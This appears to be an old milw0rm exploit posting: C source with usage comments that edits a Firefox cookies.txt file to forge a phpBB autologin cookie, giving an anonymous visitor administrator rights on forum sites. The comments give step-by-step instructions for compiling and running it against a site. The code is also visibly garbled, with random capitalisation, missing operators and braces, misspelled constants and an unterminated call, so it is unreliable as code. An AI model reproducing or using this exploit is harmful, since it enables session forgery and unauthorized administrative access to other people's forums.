/ * Painterist's code Was Nice But Heres Mil's Version.
* precompiled: http://www.milw0rm.com/sploits/897.rar
* BCC32 897.cpp
* And Place The EXE IN YOUR Firefox profile dir.
* Usually C: / Documents and settings / application data / mozilla / firefox / profiles / something.default
* Visit A Site with phpbb, close the browser, double click the exe, browse site.
* This Gives Anonymous Users Administrator Rights ONLY.
* Ya ITS Lame Im Bored Kthnx. If Something Goes Wrong Cookies.
* / STR0KE
* /
// Taken from Venomous's Love Cow Code
Char * search_and_replace (char * text, char * find, char * replace)
Len_find = strlen (find), len_replace = Strlen (Replace), len_text = strlen (text), i = 0, j = 0;
IF ((new_text = (char *) malloc (len_text len_replace-len_find 1)) == null)
Printf ("Malloc Issue ... / N");
Return new_text;
Found = strstr (Text, Find);
While (i <= len_text)
IF (Found! = Text i)
NEW_TEXT [J] = Text [I];
i ;
J ;
Strcat (new_text, replace);
I = len_find;
Found = strstr (Text i, find);
NEW_TEXT [J] = '/ 0';
Return new_text;
int main ()
File * pfile;
Long lsize;
Char * buffer;
Pfile = fopen ("cookies.txt", "r");
IF (Pfile == NULL) EXIT (1);
FSeek (pfile, 0, seek_ek);
Lsize = ftell (pfile);
Rewind (pfile);
Buffer = (char *) malloc (lsize);
IF (buffer == NULL) exit (2);
Fread (buffer, 1, lsize, pfile);
Fclose (pfile);
Pfile = fopen ("cookies.txt", "w"); FPUTS (Search_and_replace ((char *) Buffer, "A% 3A0% 3A% 7B% 7D", "A% 3A2% 3A% 7BS% 3A11% 3A% 22AUTOLOGINID% 22% 3BB% 3A1% 3BS% 3A6% 3A% 22Userid% 22% 3BS% 3A1% 3A% 222% 22% 3B% 7D "), PFILE
Fclose (pfile);
Free (buffer);
Return 0;